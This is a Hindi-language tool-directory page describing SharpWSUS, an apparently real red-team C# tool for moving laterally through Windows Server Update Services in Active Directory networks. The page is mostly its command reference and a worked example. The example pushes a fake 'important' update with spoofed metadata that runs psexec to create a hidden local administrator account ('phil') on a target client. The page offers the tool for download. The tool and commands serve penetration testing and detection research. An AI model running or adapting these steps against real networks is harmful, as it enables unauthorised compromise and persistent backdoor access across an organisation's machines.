Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SharpWSUS — C# टूल जो WSUS के माध्यम से पार्श्विक गति के लिए है, जिसमें Active Directory वातावरण में लक्षित विंडोज़ क्लाइंट्स के लिए दुर्भावनापूर्ण अपडेट बनाना, अनुमोदित करना और तैनात करना शामिल है। | Kitploit
उपकरण/GitHubGitHub/nettitude/sharpwsus
पार्श्व आंदोलनपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubnettitude/sharpwsus

SharpWSUS

C# टूल जो WSUS के माध्यम से पार्श्विक गति के लिए है, जिसमें Active Directory वातावरण में लक्षित विंडोज़ क्लाइंट्स के लिए दुर्भावनापूर्ण अपडेट बनाना, अनुमोदित करना और तैनात करना शामिल है।

रिपॉजिटरी देखें
503804 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

SharpWSUS

SharpWSUS एक CSharp उपकरण है जो WSUS के माध्यम से पार्श्विक गतिविधि के लिए है। इसके अनुरूप एक ब्लॉग (https://labs.nettitude.com/blog/introducing-sharpwsus/) है जिसमें उपकरण, उपयोग के मामले और पहचान के बारे में अधिक विस्तृत जानकारी है।

श्रेय

नीचे दिए गए संसाधनों को भारी श्रेय जिन्होंने वास्तव में इसके 90% काम किए। यह उपकरण C2 विश्वसनीयता और लचीलेपन के लिए नीचे दिए गए का एक उन्नयन मात्र है।

  • https://github.com/AlsidOfficial/WSUSpendu - WSUS के दुरुपयोग के लिए पावरशेल उपकरण
  • https://github.com/ThunderGunExpress/Thunder_Woosus - WSUS के दुरुपयोग के लिए C# उपकरण

सहायता मेनू

root@kitploit:~
 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team


Commands listed below have optional parameters in <>.

नीचे सूचीबद्ध कमांड्स में वैकल्पिक पैरामीटर <> में हैं।

WSUS सर्वर का पता लगाएं:
    SharpWSUS.exe locate

WSUS सर्वर का निरीक्षण करें, क्लाइंट, सर्वर और मौजूदा समूहों की गणना करें:
    SharpWSUS.exe inspect

एक अद्यतन बनाएं (नोट: पेलोड एक विंडोज हस्ताक्षरित बाइनरी होना चाहिए):
    SharpWSUS.exe create /payload:[File location] /args:[Args for payload] </title:[Update title] /date:[YYYY-MM-DD] /kb:[KB on update] /rating:[Rating of update] /msrc:[MSRC] /description:[description] /url:[url]>

एक अद्यतन स्वीकृत करें:
    SharpWSUS.exe approve /updateid:[UpdateGUID] /computername:[Computer to target] </groupname:[Group for computer to be added too] /approver:[Name of approver]>

एक अद्यतन की स्थिति जांचें:
    SharpWSUS.exe check /updateid:[UpdateGUID] /computername:[Target FQDN]

अद्यतन हटाएं और जोड़े गए समूहों को साफ करें:
    SharpWSUS.exe delete /updateid:[UpdateGUID] /computername:[Target FQDN] </groupname:[GroupName] /keepgroup>

उदाहरण उपयोग

root@kitploit:~
sharpwsus locate

sharpwsus inspect

sharpwsus create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user phil Password123! /add && net localgroup administrators phil /add\\"" /title:"Great UpdateC21" /date:2021-10-03 /kb:500123 /rating:Important /description:"Really important update" /url:"https://google.com"

sharpwsus approve /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local /groupname:"Awesome Group C2"

sharpwsus check /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local

sharpwsus delete /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:win10-client10.blorebank.local /groupname:"Awesome Group C2"

नोट्स

  • बाइनरी को विंडोज हस्ताक्षरित होना चाहिए, इसलिए psexec, msiexec, msbuild आदि पार्श्विक गतिविधि के लिए उपयोगी हो सकते हैं।
  • क्रिएट कमांड पर मेटाडेटा की आवश्यकता नहीं है, लेकिन यह पर्यावरण में घुलने-मिलने के लिए उपयोगी है।
  • यदि प्रयोगशाला में परीक्षण कर रहे हैं तो पहला आमतौर पर तेज़ होता है, फिर प्रत्येक बाद का अद्यतन कुछ घंटे लगेगा (यह इस कारण है कि विंडोज मूल्यांकन कैसे करता है कि कोई अद्यतन पहले से स्थापित है या नहीं)।
टूल डाउनलोड करें